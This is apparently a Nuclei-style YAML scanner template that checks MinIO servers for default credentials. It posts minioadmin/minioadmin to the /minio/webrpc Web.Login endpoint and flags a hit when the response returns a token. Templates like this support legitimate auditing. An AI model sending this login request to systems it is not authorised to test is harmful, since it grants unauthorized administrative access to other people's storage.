id: MinIO-default-login

info:
  name: MinIO 默认口令漏洞
  author: Str1am
  severity: high
  tags: MinIO,login

requests:
  - raw:
      - |
        POST /minio/webrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
        
        {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "uiVersion"
          - "token"
        part: body
        condition: and